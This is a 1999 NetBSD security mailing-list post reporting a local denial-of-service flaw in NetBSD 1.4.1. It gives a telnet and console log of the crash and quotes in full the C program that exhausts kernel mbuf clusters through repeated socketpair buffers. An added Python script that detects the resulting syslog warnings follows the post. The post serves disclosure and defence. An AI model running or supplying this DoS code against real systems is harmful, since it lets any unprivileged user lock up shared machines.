Subject: NetBSD 1.4.1 local DoS
To: None <tech-security@netbsd.org>
From: NetBSD Freak <netbsd@SDF.lonestar.org>
List: tech-security
Date: 09/01/1999 12:33:42
L. Sassaman posted a small c-script to bugtraq which is able to lock
FreeBSD 2.2.6, 2.2.8, and 3.2.x.

I tried this on my NetBSD 1.4.1 (i386) box and it worked too. After 4
minutes the machine was locked up completely, console was locked and no
telnet or ssh connection was possible.

Here's a log of the DoS (I used the falken account to show that even the
lowest user is able to perform this DoS).

---begin telnetlog---
NetBSD/i386 (delta) (ttyp0)
login: falken
Password:
Copyright (c) 1996, 1997, 1998, 1999
The NetBSD Foundation, Inc. All rights reserved.
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
NetBSD 1.4.1 (GENERIC) #1: Tue Aug 10 00:03:09 MEST 1999
Welcome to NetBSD!
$ whoami;id
falken
uid=32766(falken) gid=31(guest) groups=31(guest)
$ ps axu
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
falken 303 1.0 1.5 292 228 p0 R+ 6:20PM 0:00.02 ps -axu
root 1 0.0 0.6 252 92 ?? Is 5:44PM 0:00.11 init
root 2 0.0 45.6 0 7284 ?? DL 5:44PM 0:00.28 (pagedaemon)
root 3 0.0 45.6 0 7284 ?? DL 5:44PM 0:00.13 (reaper)
root 141 0.0 1.8 96 288 ?? Ss 5:44PM 0:00.24 syslogd
root 145 0.0 0.0 52 4 ?? IWs 5:44PM 0:00.02 portmap -l
root 173 0.0 0.7 16 96 ?? Ss 5:44PM 0:00.49 update 30
root 0 0.0 45.6 0 7284 ?? DLs 5:44PM 0:00.02 (swapper)
root 178 0.0 2.1 76 336 ?? Is 5:44PM 0:00.10 inetd -l
root 180 0.0 0.0 304 4 ?? IWs 5:44PM 0:13.63 /usr/local/sbin/sshd1
root 287 0.0 5.7 496 900 ?? Is 6:18PM 0:00.04 sendmail: accepting connections on port 25
root 289 0.0 4.0 132 640 ?? S 6:18PM 0:00.40 telnetd
falken 290 0.0 1.4 356 208 p0 Ss 6:18PM 0:00.31 -sh
root 175 0.0 3.1 276 488 ?? Is 5:44PM 0:00.25 cron
$ date
Wed Sep 1 18:21:35 CEST 1999
$ ./hangupbsd &
$
---end telnetlog---
---begin consolelog---
Sep 1 18:25:56 delta /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS
Sep 1 18:27:41 delta /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS
Sep 1 18:29:14 delta /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS
Sep 1 18:31:36 delta /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS
---end consolelog---

Any ideas how to prevent/fix this?

yours,
NetBSD Freak
netbsd@sdf.lonestar.org

DoS code by L. Sassaman (rabbi@QUICKIE.NET):
---begin c-script---
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
        int p[2], i;
        char crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        return(0);
}
---end c-script---
<eof>
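
On the detection side, an added example (not part of the original post and not NetBSD project code) that scans syslog output for the `mclpool limit reached` warning shown in the console log and reports a host once several warnings arrive within a short window. The threshold, the window length and the names `parse` and `find_bursts` are assumptions chosen for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Kernel warning as it appears in the console log on this page.
WARNING = re.compile(r"^(\w{3}\s+\d{1,2}\s+[\d:]{8})\s+(\S+)\s+"
                     r"/netbsd: WARNING: mclpool limit reached")

# Console lines from the post (wraps rejoined) plus one constructed unrelated line.
SAMPLE = [
    "Sep 1 18:20:02 delta inetd[178]: constructed unrelated line",
    "Sep 1 18:25:56 delta /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS",
    "Sep 1 18:27:41 delta /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS",
    "Sep 1 18:29:14 delta /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS",
    "Sep 1 18:31:36 delta /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS",
]

def parse(line, year):
    """Return (host, timestamp) for an mclpool warning, else None."""
    m = WARNING.match(line)
    if m is None:
        return None
    # Syslog omits the year and may pad the day with a space; normalise both.
    stamp = " ".join(m.group(1).split())
    return m.group(2), datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def find_bursts(lines, year, threshold=3, window=timedelta(minutes=10)):
    """Return (host, first, last) when a host reaches threshold warnings within window."""
    recent = defaultdict(deque)   # host -> warning times still inside the window
    alerting = set()              # hosts already reported for the current burst
    alerts = []
    for line in lines:
        hit = parse(line, year)
        if hit is None:
            continue
        host, when = hit
        times = recent[host]
        times.append(when)
        while when - times[0] > window:
            times.popleft()
        if len(times) < threshold:
            alerting.discard(host)      # burst over; allow a future report
        elif host not in alerting:
            alerting.add(host)
            alerts.append((host, times[0], when))
    return alerts

if __name__ == "__main__":
    for host, first, last in find_bursts(SAMPLE, year=1999):
        print(f"{host}: repeated mclpool exhaustion from {first} to {last}")
```

With the log above, the third warning at 18:29:14 is the one that trips the report, roughly eight minutes after the process was started.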